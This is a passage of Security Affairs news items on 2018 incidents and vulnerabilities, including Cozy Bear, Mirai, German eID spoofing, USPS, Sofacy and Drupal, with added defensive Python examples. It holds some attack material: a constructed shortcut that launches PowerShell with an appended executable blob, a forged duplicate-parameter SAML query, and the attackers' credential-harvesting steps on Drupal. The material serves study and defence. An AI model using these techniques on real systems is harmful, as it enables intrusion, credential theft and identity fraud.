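        raise ValueError("not a shell link file")
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize covers the whole block
        off += struct.unpack_from("<I", data, off)[0]
    strings = {}
    width = 2 if flags & IS_UNICODE else 1
    for bit, key in STRING_SECTIONS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]   # CountCharacters
            off += 2
            raw = data[off:off + count * width]
            off += count * width
            strings[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
    # ExtraData: size-prefixed blocks; a size below 4 is the terminal block
    while off + 4 <= len(data):
        block_size = struct.unpack_from("<I", data, off)[0]
        off += block_size if block_size >= 4 else 4
        if block_size < 4:
            break
    return {"flags": flags, "strings": strings, "structure_end": off,
            "trailing_bytes": len(data) - off}


def assess_lnk(data, max_benign_size=4096):
    """Defender-side triage: the reasons a shortcut deserves a closer look."""
    info = parse_lnk(data)
    reasons = []
    if info["trailing_bytes"] > 0:
        reasons.append(f"{info['trailing_bytes']} bytes appended after the link structure")
    if len(data) > max_benign_size:
        reasons.append(f"file is {len(data)} bytes, larger than a typical shortcut")
    args = info["strings"].get("arguments", "").lower()
    hits = [i for i in INTERPRETERS if i in args]
    if hits:
        reasons.append("script interpreter in arguments: " + ", ".join(hits))
    return reasons


def build_lnk(arguments, trailing=b""):
    """Constructed minimal shortcut for the demo: header with only
    HasArguments|IsUnicode set, one StringData section, the terminal block,
    then whatever bytes the caller wants appended (standing in for a payload)."""
    flags = 0x20 | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIH", HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0) + b"\x00" * 10   # 10 reserved bytes
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + args + struct.pack("<I", 0) + trailing


# Constructed samples: an ordinary shortcut and one carrying an appended blob.
BENIGN = build_lnk("/open readme.txt")
CARRIER = build_lnk("powershell -NoProfile -File stage.ps1",
                    trailing=b"MZ" + b"\x00" * 4094)

if __name__ == "__main__":
    print("benign :", assess_lnk(BENIGN))
    print("carrier:", assess_lnk(CARRIER))
```

A real shortcut may legitimately carry several ExtraData blocks (tracker, property store, environment), which the parser skips by their declared sizes; only bytes past the terminal block count as trailing.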

The C2 domain “pandorasong[.]com” recalls the legitimate “pandora.com” domain name of one of the most popular music streaming services in the US. Moreover, the requests sent by the malware are forged to look like legitimate Pandora traffic, using information publicly available on GitHub.

According to FireEye’s report the final DLL contains a beaconing payload generated with Cobalt Strike, a well-known post-exploitation framework typically used by Red-Teams.

The complete analysis conducted by Cybaze ZLab – Yoroi, including the Yara rules, is reported in the post “New “Cozy Bear” campaign, old habits” on the Yoroi blog.

Pierluigi Paganini

(Security Affairs – Cozy Bear APT, cyberespionage)


13 fraudulent apps into Google Play have been downloaded 560,000+ times

Malware researcher discovered 13 fraudulent apps into Google Play that have been already downloaded and installed more than 560,000 times.

Malware researcher Lukas Stefanko from security firm ESET discovered 13 malicious apps in Google Play that had already been downloaded and installed over half a million times (more than 560,000).

The malicious apps could allow attackers to install another app and trick the user into giving the permissions necessary for the installation.

All the malicious apps pose as games and were published by the same developer, named Luis O Pinto; at the time of discovery they had a low detection rate.

The cybercriminals aim to monetize their efforts pushing unsolicited advertisements to the user when they unlock the device.

Once installed, the malicious apps immediately remove their icon from the display and download other malicious apps in the background.

The applications were all downloaded from a hardcoded address.

In order to trick users into giving permissions to install the downloaded app, the malicious apps attempt to make the user believe that the installation failed and restarted, asking users to approve the action again.

Stefanko reported that the downloaded APK was Game Center; once installed and executed, it hides itself and starts displaying ads.

The expert pointed out that the Game Center requests permissions for full network access and to view network and Wi-Fi connections, and to run at startup.

The malicious apps do not implement specific features, they only work as simple downloaders that can bypass Google Play security checks.

Stefanko confirmed that Game Center is no longer available at the link hardcoded in the malicious apps; after being informed of the fraudulent applications, Google removed them from Google Play.

Pierluigi Paganini

(Security Affairs – Google Play, malicious apps)


Software company OSIsoft has suffered a data breach

Software company OSIsoft has suffered a data breach, the firm confirmed that all domain accounts have likely been compromised.

Software company OSIsoft notified a security breach to employees, interns, consultants, and contractors.

The company offers real-time data management solutions; its core product is the PI System, an open enterprise infrastructure that connects sensor-based data, systems, and people.

The PI System product is used by organizations to collect, analyze and visualize data to improve internal processes.

According to the data breach notification published by the company and submitted to the Office of the Attorney General in California, attackers used stolen credentials to remotely access company systems.

“OSIsoft is experiencing a security incident that may affect employees, interns, consultants and contractors. Stolen credentials were used to remotely access OSIsoft computers.” reads the data breach notification.

“OSIsoft intrusion detection systems alerted IT to unauthorized activity. Our security service provider has recovered direct evidence of credential theft activity involving 29 computers and 135 accounts. We have concluded, however, that all OSI domain accounts are affected.”

Hackers accessed OSI domain logon account names, email addresses, and passwords; although Active Directory (AD) protects stored credentials cryptographically, users’ personal credentials may have been compromised.

The company is still investigating the security breach, in the meantime, it has developed a comprehensive remediation strategy.

The notification submitted to the Office of the Attorney General lists eight different dates between March 23, 2017, and July 26, 2018, a span of more than a year. Below are the dates provided by the company.

  • Thursday, March 23, 2017
  • Saturday, May 6, 2017
  • Tuesday, May 9, 2017
  • Saturday, August 5, 2017
  • Wednesday, April 18, 2018
  • Wednesday, May 23, 2018
  • Wednesday, July 18, 2018
  • Thursday, July 26, 2018

The company is resetting compromised passwords; it also urges affected people to change passwords on external services if they were also used for the OSI account, to report suspicious activity to the IT team, and to disable or restrict remote access and file sharing features on their devices.

Pierluigi Paganini

(Security Affairs – OSIsoft, data breach)


Chaining 3 zero-days allowed pen testers to hack Apple macOS computers

Dropbox team disclosed three critical zero-day vulnerabilities in Apple macOS, chaining them it is possible to take over a Mac computer.

Dropbox team disclosed three critical zero-day vulnerabilities (CVE-2017-13890, CVE-2018-4176, CVE-2018-4175) affecting the Apple macOS operating system, an attacker could chain them to remotely execute arbitrary code on a targeted Mac computer.

The attacker only needs to trick victims into visiting a specially crafted website.

The vulnerabilities were discovered by experts at cybersecurity firm Syndis, which was hired by Dropbox to carry out a penetration test on the company’s IT infrastructure.

The experts also assessed the Apple software used by Dropbox.

The flaws were reported to the Apple security team in February and Apple quickly addressed them with the release of the March security updates.

The vulnerabilities affected all systems running the latest version of the Safari web browser and operating system.

The CVE-2017-13890 vulnerability affected the CoreTypes component of macOS: processing a maliciously crafted webpage could result in the automatic mounting of a disk image.

The CVE-2018-4176 flaw was tied to the way Disk Images handled .bundle files: mounting a malicious disk image could result in the launching of an application.

The last vulnerability, tracked as CVE-2018-4175, could be exploited to bypass the macOS Gatekeeper security feature using a maliciously crafted application.

The issue allowed an attacker to bypass code signing enforcement and execute a modified version of the Terminal app, leading to arbitrary command execution.

The experts were able to chain the vulnerabilities to take over a Mac system by tricking a victim into visiting a malicious web page with Safari.

“Syndis was able to chain these together in a two-stage exploit to achieve arbitrary code execution for a user who visits a specially crafted web page with Safari.” reads a blog post published by Dropbox.

“The first stage includes a modified version of the Terminal app, which is registered as a handler for a new file extension (.workingpoc). In addition it would contain a blank folder called “test.bundle” which would be set as the default “openfolder” which automatically would open /Applications/Terminal.app without prompt. The second stage includes an unsigned shellscript with the extension “.workingpoc” which is then executed within the running Terminal application without prompt.”

Below is a video PoC published by Dropbox:


Pierluigi Paganini

(Security Affairs – macOS, hacking)


Flaw allowing identity spoofing affects authentication based on German eID cards

The authentication process via German eID cards with RFID chips is flawed, an attacker could impersonate any other citizen.

The nightmare comes true: the authentication process via German eID cards with RFID chips is flawed, and the flaw could allow an attacker to spoof an identity and change the date of birth.

The situation is very serious: the new cards are accepted as an ID document in most European countries and allow German citizens to access online government services (e.g. the tax service).

The German ID cards issued since November 1st, 2010, store the holder’s information (i.e. name, date of birth, a biometric picture, and optionally fingerprints) in the embedded radio frequency identification (RFID) chip.

The cards can be used to authenticate the holder via the RFID chip; in this scenario, an eID application (e.g. AusweisApp) is used along with an RFID smartcard reader.

The mutual authentication leverages a PKI infrastructure. The authentication process starts with the web application sending a request to the eID client, which initiates all further steps needed for the authentication and asks the user for a PIN.

The web application communicates with an authentication server (eID-Server or SAML-Processor), which provides it with the data contained in the RFID chip (i.e. the name or date of birth of the citizen).


To prevent eavesdropping, the response is digitally signed by the authentication server.

Security researchers at SEC Consult Vulnerability Lab demonstrated that it is possible to spoof the identity of a German eID card holder and alter data.

Security expert Wolfgang Ettlinger at SEC Consult Vulnerability Lab discovered a flaw in the Governikus Autent SDK, which companies can use to implement ID card authentication to a web service via German eID cards.

The expert devised a method to alter the digitally signed response from the server while keeping it valid for the client; he was able to authenticate with an arbitrary name (he used the name of the popular writer Johann Wolfgang von Goethe and his address) against a demo version of the AusweisApp eID client.

The expert discovered that the signature verification in the Governikus Autent SDK does not handle a parameter with the same name occurring multiple times. This implies that the parameter is validated just once, and the other instances are processed as if they had already passed verification.

“The vulnerability abuses the fact that HTTP allows multiple parameters having the same name. When the method HttpRedirectUtils.checkQueryString creates a canonical version of the query string, it parses the parameters from it and generates a new query string with the parameters placed in a specific order. The case that a parameter can occur multiple times, is not considered.” reads the analysis published by the expert.

“If an attacker supplies multiple parameters named SAMLResponse, the signature is verified against the last occurrence of the parameter, while the SAML response that is processed further, will be taken from the first occurrence.”

All the attacker needs is a query string signed by the authentication server; it does not matter whether it is still valid, because the expiration check is conducted on the manipulated data. According to the expert, such a string could be easily obtained with a Google search for eID client logs.
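The duplicate-parameter flaw described above, as an added Python example (not the Autent SDK’s own code): a simplified signed SAML redirect query in which canonicalization keeps the last SAMLResponse for the signature check while processing reads the first, beside a hardened verifier that rejects repeated parameter names and processes exactly the values it verified. The HMAC key, the fixed parameter order and all sample values are constructed stand-ins for the eID-Server’s real (asymmetric) signature.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

# Constructed stand-in for the eID-Server's signing key. The real SDK verifies
# an asymmetric signature; the parameter-handling flaw does not depend on the
# signature algorithm, so an HMAC keeps the example self-contained.
SERVER_KEY = b"constructed-demo-key"
# Hypothetical canonical order, modelled on the SAML HTTP-Redirect binding.
SIGNED_ORDER = ("SAMLResponse", "RelayState", "SigAlg")


def canonical_query(params):
    """Rebuild the query string in the fixed order the signature covers."""
    return urlencode([(n, params[n]) for n in SIGNED_ORDER if n in params])


def sign_query(params):
    """Server side: emit the canonical query string plus its signature."""
    canonical = canonical_query(params)
    sig = hmac.new(SERVER_KEY, canonical.encode(), hashlib.sha256).hexdigest()
    return f"{canonical}&Signature={sig}"


def _signature_ok(params):
    expected = hmac.new(SERVER_KEY, canonical_query(params).encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, params.get("Signature", ""))


def verify_vulnerable(query):
    """Mirrors the flawed flow: canonicalization keeps the LAST value of each
    name, so the signature check passes on the genuinely signed values, but the
    application then reads the FIRST occurrence (getParameter semantics).
    Returns (signature_valid, samlresponse_actually_processed)."""
    pairs = parse_qsl(query, keep_blank_values=True)
    last, first = {}, {}
    for name, value in pairs:
        last[name] = value
        first.setdefault(name, value)
    return _signature_ok(last), first.get("SAMLResponse")


def verify_hardened(query):
    """Fixed flow: refuse any query in which a parameter name repeats, then
    verify and process the very same values."""
    pairs = parse_qsl(query, keep_blank_values=True)
    seen = {}
    for name, value in pairs:
        if name in seen:
            raise ValueError(f"duplicate HTTP parameter: {name}")
        seen[name] = value
    if not _signature_ok(seen):
        raise ValueError("invalid signature")
    return seen["SAMLResponse"]


# Constructed sample: a response genuinely signed by the server...
LEGIT = sign_query({"SAMLResponse": "response-for-real-cardholder",
                    "RelayState": "session-42",
                    "SigAlg": "hmac-sha256"})
# ...and the same string with a second, unsigned SAMLResponse placed first.
POLLUTED = "SAMLResponse=response-for-Goethe&" + LEGIT

if __name__ == "__main__":
    print(verify_vulnerable(POLLUTED))   # (True, 'response-for-Goethe')
    print(verify_hardened(LEGIT))        # response-for-real-cardholder
    try:
        verify_hardened(POLLUTED)
    except ValueError as exc:
        print("rejected:", exc)
```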

Ettlinger published a video PoC of the attack:

The vulnerability affects Web applications running Autent SDK 3.8.1 and earlier that handle duplicate HTTP parameters.

SEC Consult privately reported technical details of the issues to CERT-Bund in July, and Governikus released version 3.8.1.2 of its SDK to fix the flaw.

Experts pointed out that the attack works only partially for services that require an initial registration.

“The id card authentication specification includes the concept of pseudonyms. A pseudonym is a random-looking string generated by the id card. For each web application, the id card generates a different pseudonym. When the user creates an account, the pseudonym is stored by the web application. During login, the web application only requires to request the pseudonym string from the id card and compare it with the values stored in its user database.” conclude the experts.

“As another user’s pseudonym is not easily guessable, an attacker cannot login as another user. The account creation step, however, is still affected by this vulnerability as the attacker could simply generate a random pseudonym. Moreover, this attack is only applicable to web applications that use the method HttpServletRequest.getParameter.”

Pierluigi Paganini

(Security Affairs – German eID cards, hacking)


Experts found first Mirai bot targeting Linux servers via Hadoop YARN flaw

Security experts from Netscout ASERT discovered more than ten Mirai bot variants attempting to exploit a recently disclosed flaw in Hadoop YARN on Intel servers.

These Mirai variants are the first that don’t target Internet of Things devices; the bot was specifically developed to target Linux servers.

The Hadoop YARN vulnerability is a command injection flaw that could be exploited by attackers to remotely execute arbitrary shell commands on a vulnerable server.

The new versions don’t implement worm-like spreading abilities, instead, threat actors leverage exploits to spread the malware.

Netscout observed tens of thousands of exploit attempts daily targeting its honeypots; in November, attackers attempted to deliver some 225 unique malicious payloads exploiting the Hadoop YARN vulnerability.

One of the variants spotted by the experts labeled itself as VPNFilter, even if it is not linked with the infamous VPNFilter bot that infected more than a half-million small and home office routers in May.

“ASERT has been monitoring exploit attempts for the Hadoop YARN vulnerability in our honeypot network and found a familiar, but surprising payload – Mirai. These versions of Mirai behave much like the original but are tailored to run on Linux servers and not underpowered IoT devices.” reads the analysis published by the experts.

“Mirai botmasters that target Linux servers no longer need to tailor their malware for strange architectures, they assume their targets are using x86.”

This specific Mirai variant only delivers the x86 build of the bot because most Hadoop YARN services run on x86 Linux servers.

Other IoT Mirai variants first examine the victim device in order to deliver the proper executable (x86, x64, ARM, MIPS, ARC, etc.).

Vulnerable Linux servers are a privileged target for attackers, who attempt to compromise them to carry out malicious activities using hardware resources far greater than those of IoT devices.

“The limited number of sources we’ve seen continually scanning for the Hadoop YARN vulnerability may indicate this activity is the work of a small group of attackers. Their goal is clear – to install the malware on as many devices as possible.” concluded the experts.

“Once gaining a foothold, Mirai on a Linux server behaves much like an IoT bot and begins brute-forcing telnet usernames and passwords. What’s different now is that among the small, diminutive devices in the botnet lurk fully powered Linux servers.”

Pierluigi Paganini

(Security Affairs – Mirai, Linux)

The post Experts found first Mirai bot targeting Linux servers via Hadoop YARN flaw appeared first on Security Affairs.

A flaw in US Postal Service website exposed data on 60 Million Users

US Postal Service has patched a critical bug that allowed anyone who has an account at usps.com to view and modify account details for other users

US Postal Service has patched a critical bug that allowed anyone who has an account at usps.com to view and modify account details for other users, some 60 million users were affected.

The news was first reported by the popular investigator Brian Krebs, who was contacted by the researcher who discovered the issue.

The researcher, who asked to remain anonymous, reported the flaw to the USPS more than a year ago, but the organization ignored him. After the public disclosure of the issue, USPS fixed it.

The problem resides in the USPS Informed Visibility API, designed to let businesses, advertisers and other bulk mail senders “make better business decisions by providing them with access to near real-time tracking data” about mail campaigns and packages.

“In addition to exposing near real-time data about packages and mail being sent by USPS commercial customers, the flaw let any logged-in usps.com user query the system for account details belonging to any other users, such as email address, username, user ID, account number, street address, phone number, authorized users, mailing campaign data and other information.” reads the post on KrebsonSecurity blog.

“Many of the API’s features accepted “wildcard” search parameters, meaning they could be made to return all records for a given data set without the need to search for specific terms.”

The researcher discovered that by using the API to search for a single data element (e.g. an address), it was possible to retrieve multiple accounts that shared that data.

“For example, a search on the email addresses for readers who volunteered to help with this research turned up multiple accounts when those users had more than one user signed up at the same physical address.” continues Krebs.

“This is not good,” said one anonymous reader who volunteered to help with this research, after viewing a cut-and-paste of his USPS account details looked up via his email address. “Especially since we moved due to being threatened by a neighbor.”


USPS implemented a validation step to prevent unauthorized changes to some specific data fields.

When a user attempts to modify the email address associated with a specific USPS account via the API, a confirmation message is sent to the email address tied to that account.

The good news is that the API does not appear to expose USPS account passwords.
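The lookup weakness Krebs describes (any logged-in user querying any account, wildcards returning whole data sets) and the confirmation step USPS added, modelled as an added Python example that is not code from USPS or the article; the account records, field names and the in-memory outbox that stands in for mail delivery are constructed for the demonstration.

```python
import secrets
from fnmatch import fnmatchcase

# Constructed sample account records (made-up users); the field names follow
# those the article lists as exposed by the API.
ACCOUNTS = [
    {"user_id": 1, "username": "alice", "email": "alice@example.com", "address": "1 Main St"},
    {"user_id": 2, "username": "bob", "email": "bob@example.com", "address": "1 Main St"},
    {"user_id": 3, "username": "carol", "email": "carol@example.com", "address": "9 Oak Ave"},
]
SEARCHABLE_FIELDS = {"email", "address"}
PENDING_CHANGES = {}  # confirmation token -> (account_id, new_email)


class AuthorizationError(Exception):
    pass


def search_accounts_vulnerable(caller_id, field, pattern):
    """The weakness the article describes: any logged-in caller can query any
    field, and a wildcard pattern returns every record in the data set.
    caller_id is accepted but never used to restrict the result."""
    return [a for a in ACCOUNTS if fnmatchcase(a[field], pattern)]


def search_accounts_hardened(caller_id, field, pattern):
    """Hardened handler: whitelist the searchable fields, reject wildcard
    parameters, and return only the record that belongs to the caller."""
    if field not in SEARCHABLE_FIELDS:
        raise ValueError(f"field not searchable: {field}")
    if any(c in pattern for c in "*?["):
        raise ValueError("wildcard search parameters are not accepted")
    return [a for a in ACCOUNTS if a["user_id"] == caller_id and a[field] == pattern]


def request_email_change(caller_id, account_id, new_email, outbox):
    """Validation step of the kind the article says USPS added: the change is
    not applied directly; a confirmation token goes to the address currently
    tied to the account, and only the account owner may request it."""
    if caller_id != account_id:
        raise AuthorizationError("callers may only modify their own account")
    account = next(a for a in ACCOUNTS if a["user_id"] == account_id)
    token = secrets.token_urlsafe(16)
    PENDING_CHANGES[token] = (account_id, new_email)
    outbox.append({"to": account["email"], "token": token})  # outbox stands in for mail delivery
    return token


def confirm_email_change(token):
    """Apply the change only when the holder of the old mailbox presents the token."""
    if token not in PENDING_CHANGES:
        raise AuthorizationError("unknown or already used confirmation token")
    account_id, new_email = PENDING_CHANGES.pop(token)
    account = next(a for a in ACCOUNTS if a["user_id"] == account_id)
    account["email"] = new_email
    return account
```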

“The API at issue resides here; a copy of the API prior to its modification on Nov. 20 by the USPS is available here as a text file.” continues Krebs.

Such flaws are very dangerous: spammers could abuse them for several malicious purposes, including phishing campaigns.

Krebs also pointed out that a vulnerability assessment of Informed Visibility was published in October 2018 by the USPS’s Office of Inspector General (OIG).

Auditors discovered several authentication and encryption flaws that were evidently underestimated.

“The USPS told the OIG it had addressed the authentication problems raised in the audit report, which appear to have been related to how data was encrypted in transit.”

Pierluigi Paganini

(Security Affairs – Hacking, US Postal Service)


Facebook increases rewards for its bug bounty program and facilitates bug submission

Facebook has updated its bug bounty program, increasing the overall rewards for security flaws that could be exploited to take over accounts.

Facebook announced an important novelty for its bug bounty: the social media giant is going to pay out as much as $40,000 for vulnerabilities that can be exploited to hack into accounts without user interaction.

The Facebook bug bounty program will also cover other companies owned by the social network giant, including Instagram, WhatsApp, and Oculus.

Vulnerabilities that require minimal user interaction to exploit will be rewarded with $25,000.

“The researchers who find vulnerabilities that can lead to a full account takeover, including access tokens leakage or the ability to access users’ valid sessions, will be rewarded an average bounty of:

* $40,000 if user interaction is not required at all, or 
* $25,000 if minimum user interaction is required.” reads the post published by Facebook.


Increasing Bounties for Account Takeover Vulnerabilities: Since 2011, our Bug Bounty program has been among the most…

Posted by Facebook Bug Bounty on Tuesday, 20 November 2018

Bug bounty programs are becoming crucial for companies to assess their products and infrastructure and to avoid data breaches.

In September, a vulnerability in the ‘View As’ feature allowed hackers to steal access tokens that could be used to hijack accounts and access third-party apps that used Facebook as an authentication platform.


Facebook revealed that hackers accessed data of 29 million users, fewer than the 50 million initially thought.

Attackers accessed the names, phone numbers and email addresses of 15 million users, while for another 14 million users hackers also accessed usernames, profile details (i.e. gender, relationship status, hometown, birthdate, city, and devices), and their 15 most recent searches.

For the remaining one million users affected by the Facebook Data Breach whose “access tokens” were stolen, no data was accessed.

The hackers started on September 14 with 400,000 “seed accounts” they controlled directly; they then expanded their activity to those accounts’ networks.

Facebook aims to encourage white hat hackers to report critical flaws in the social media platform by increasing the bug bounty awards and simplifying the process for reporting account takeover issues.

“By increasing the award for account takeover vulnerabilities and decreasing the technical overhead necessary to be eligible for bug bounty, we hope to encourage an even larger number of high quality submissions from our existing and new white hat researchers to help us secure over 2 billion users.” concludes Facebook.

Pierluigi Paganini

(Security Affairs – Hacking, Facebook bug bounty program)


Amazon UK is notifying a data breach to its customers days before Black Friday

Many readers of the Register shared with the media outlet an email sent from the Amazon UK branch notifying them of an accidental data leak.

The news is disconcerting: Amazon has suffered a data breach a few days before Black Friday.

Amazon informed its customers that it had “inadvertently disclosed [their] name and email address due to a technical error”.

The messages include an HTTP link to the company website and read:

“Hello,

We’re contacting you to let you know that our website inadvertently disclosed your name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action.

Sincerely, Customer Service”

The Register confirmed that the email is genuine and was sent by Amazon UK; the press office acknowledged its authenticity.

“We have fixed the issue and informed customers who may have been impacted.” states the press office.

At the time of writing, the number of affected customers is unclear, as is whether Amazon has informed the Information Commissioner’s Office.

The company did not disclose technical details of the incident, and the root cause is not known.

The Register pointed out that not only UK customers are receiving a data breach notification from Amazon: people from the US, the Netherlands and South Korea also claim to have received the same message.

Pierluigi Paganini

(Security Affairs – Amazon UK, hacking)


Experts found flaws in Dell EMC and VMware Products. Patch them now!

Security experts have found several vulnerabilities affecting Dell EMC Avamar and Integrated Data Protection Appliance products. They also warn that VMware’s vSphere Data Protection, which is based on Avamar, is also affected by the issues.

Dell EMC released security updates for Dell EMC Avamar Client Manager in Dell EMC Avamar Server and Dell EMC Integrated Data Protection Appliance (IDPA) to address a critical remote code execution issue and a medium open redirection flaw.

Dell acknowledged the cybersecurity firm TSS for the discovery of the flaws.

The remote code execution vulnerability, tracked as CVE-2018-11066, could be exploited by a remote unauthenticated attacker to execute arbitrary commands on the vulnerable server.

Affected versions are Dell EMC Avamar Client Manager in Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0, 7.4.1, 7.5.0, 7.5.1, 18.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1 and 2.2.

“Dell EMC Avamar Client Manager in Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0, 7.4.1, 7.5.0, 7.5.1, 18.1 and Dell EMC Integrated Data Protection Appliance (IDPA) versions 2.0, 2.1 and 2.2 contain a Remote Code Execution vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to execute arbitrary commands on the server.” reads the security advisory published.

The vulnerability received a CVSS v3 Base Score of 9.8.

The second issue, tracked as CVE-2018-11067, can be exploited by an unauthenticated attacker to redirect users to arbitrary URLs by tricking them into clicking on a specially crafted link.

Dell also disclosed a high severity information exposure vulnerability, tracked as CVE-2018-11076, that affects the above products. The flaw could be exploited by attackers to compromise the vulnerable systems; it affects Dell EMC Avamar Server versions 7.2.0, 7.2.1, 7.3.0, 7.3.1, 7.4.0 and 7.4.1 and Dell EMC Integrated Data Protection Appliance (IDPA) 2.0.

“Dell EMC Avamar and IDPA are affected by an Information Exposure vulnerability that may potentially be exploited by an attacker to compromise the affected systems.” reads the security advisory published by the company.

“Avamar Java management console’s SSL/TLS private key may be leaked in the Avamar Java management client package. The private key could potentially be used by an unauthenticated attacker on the same data-link layer to initiate a MITM attack on management console users.” 

Since VMware vSphere Data Protection (VDP) is based on the Avamar Virtual Edition, it is also affected by the flaws. The virtualization giant published a security advisory to inform its customers that the issues affect VDP 6.0.x and 6.1.x.

Pierluigi Paganini

(Security Affairs – RCE, Dell EMC Avamar)


Sofacy APT group used a new tool in latest attacks, the Cannon

Sofacy APT group (aka APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) has a new weapon in its arsenal dubbed Cannon.

The Russia-linked APT group delivers Cannon in a spear-phishing attack that targets government organizations in North America, Europe, and a former USSR state.

Experts at Palo Alto Networks spotted a new campaign in late October and early November; the spear-phishing messages used Word documents that loaded remote templates embedding malicious macro code.

The novelty in the latest attacks is the use of a tool that has not been seen before; the attackers also used an uncommon technique to deliver the malware and to avoid running in a sandbox.

“Once the victim presses the Enable content button, the embedded macro is executed. The macros used for these delivery documents use a less common method of using the AutoClose function. This is a form of anti-analysis as Word will not fully execute the malicious code until the user closes the document.” reads the analysis published by Palo Alto Networks.

“If an automated sandbox exits its analysis session without specifically closing out the document, the sandbox may miss the malicious activity entirely. Once successfully executed, the macro will install a payload and save a document to the system.”

Cannon acts as a downloader and relies on emails to communicate with the C2 server and receive instructions.

The tool implements a broad range of abilities, including adding persistence, creating a unique system identifier, gathering system information, grabbing snapshots of the desktop, and logging into a POP3 email account to get access to attachments.

Cannon uses three accounts hosted at a Czech service provider called Seznam to send emails. The attackers used the email account ‘sahro.bella7[at]post.cz’ as the C2 point.

“The overall purpose of Cannon is to use several email accounts to send system data (system information and screenshot) to the threat actors and to ultimately obtain a payload from an email from the actors,” the researchers explain.

Experts reported that Sofacy hackers exploited the interest in the Lion Air airplane crash to carry out an attack. Hackers used weaponized files named ‘crash list (Lion Air Boeing 737).docx’ for their campaigns.


APT28 appears very active in this period, and Cannon isn’t the only novelty in its arsenal: the Cybaze ZLab – Yoroi team recently discovered a new variant of the infamous APT28 Lojax (aka Double-Agent). It is the latest version of the well-known rootkit Double-Agent, previously analyzed by ESET researchers.

Further details on the Cannon attacks, including IoCs, are reported in the analysis published by Palo Alto Networks.

Pierluigi Paganini

(Security Affairs – Sofacy APT, Cannon tool)

Hackers target Drupal servers chaining several flaws, including Drupalgeddon2 and DirtyCOW

Hackers targeted Drupal web servers chaining some known vulnerabilities, including Drupalgeddon2 and DirtyCOW issues.

Security experts at Imperva reported an attack against Drupal web servers running on Linux-based systems. Hackers exploited the Drupalgeddon2 flaw (CVE-2018-7600) along with other issues. Drupalgeddon2 could be exploited to take over a website; it affects Drupal versions 6, 7 and 8.

The other flaw exploited in the attacks is the DirtyCOW issue, a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings. The flaw could be exploited by a local attacker to escalate privileges.

In the attack observed by Imperva, hackers attempted to break into the Drupal servers by chaining Drupalgeddon2 and DirtyCOW; they also attempted to gain access to the target machines via system misconfigurations.

“In this post we’ll unpack a short — but no less serious — attack that affected some Linux-based systems, on October 31. Throughout the campaign, the attacker used a chain of vulnerabilities including the infamous Drupalgeddon2 and DirtyCOW, and system misconfigurations to persistently infect vulnerable Drupal web servers and take over user machines.” reads the analysis published by Imperva.

The new attack stands out because the hackers aimed at persistence on the target: they opted for a technique that easily re-infects a vulnerable server in case the process is terminated or the server restarts, and that can run additional malicious code.

The attackers create a word list by locating all of Drupal’s settings files and extracting all of the lines that contain the word “pass”.

This attack could be effective if administrators leave ‘root’ as the user the web application uses to connect to the database. The attackers can then attempt to use the command ‘su root’ to change the user to root.


If the administrator did not leave the root passwords in the configuration files, the hackers attempt to exploit the DirtyCOW flaw to escalate privileges to root.

“If the attacker succeeds in changing the user, they can proceed to download the secondary payload ‘sshdstuff’ and execute (more details below).” continues the post.

“If the administrator was careful and didn’t leave root passwords in the configuration files, this technique fails, and the attacker tries to exploit the DirtyCOW bug to escalate their privileges to root.”

The attackers attempted to use three different implementations of the DirtyCOW exploit, one of which was in raw form (a C source code file) and was compiled at runtime.
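A defender's check for the misconfiguration the attack chain depends on, written as an added Python example (not code from Imperva or the article): it parses the database connections in a Drupal settings.php, shows which lines a grep for “pass” would expose, and flags any connection whose database user is root. The settings fragment and its passwords are constructed for the demonstration.

```python
import re

# Constructed Drupal settings.php fragment for this demonstration (not taken
# from the article). The second connection is the weak setup the article warns
# about: the web application talks to the database as 'root'.
SAMPLE_SETTINGS = r"""
$databases['default']['default'] = array(
  'driver' => 'mysql',
  'database' => 'drupal',
  'username' => 'drupal_app',
  'password' => 'CONSTRUCTED-APP-PASSWORD',
  'host' => '127.0.0.1',
);
$databases['legacy']['default'] = [
  'driver' => 'mysql',
  'database' => 'old_site',
  'username' => 'root',
  'password' => 'CONSTRUCTED-ROOT-PASSWORD',
  'host' => 'localhost',
];
"""

# One "$databases[...] = array( ... );" or "$databases[...] = [ ... ];"
# assignment; the group captures the body with the key => value pairs.
CONN_RE = re.compile(r"\$databases\[[^\n]*?\]\s*=\s*(?:array\s*\(|\[)(.*?)[\)\]]\s*;", re.S)
KEY_RE = re.compile(r"'(\w+)'\s*=>\s*'([^']*)'")


def parse_database_connections(settings_text):
    """Return a {key: value} dict for every database connection defined in the file."""
    return [dict(KEY_RE.findall(body)) for body in CONN_RE.findall(settings_text)]


def lines_mentioning_pass(settings_text):
    """The lines the article says the attackers collect into a word list:
    every line of the settings file containing the substring 'pass'."""
    return [ln.strip() for ln in settings_text.splitlines() if "pass" in ln]


def connections_using_root(settings_text):
    """Defender's audit: connections whose DB user is 'root'. This is the
    condition under which a password read from settings.php is also a
    candidate for 'su root' on the host, so these should be re-pointed to a
    dedicated low-privilege database account."""
    return [c for c in parse_database_connections(settings_text) if c.get("username") == "root"]


def audit_settings_file(path):
    """Run the audit against a real settings.php on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return connections_using_root(fh.read())
```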

One of the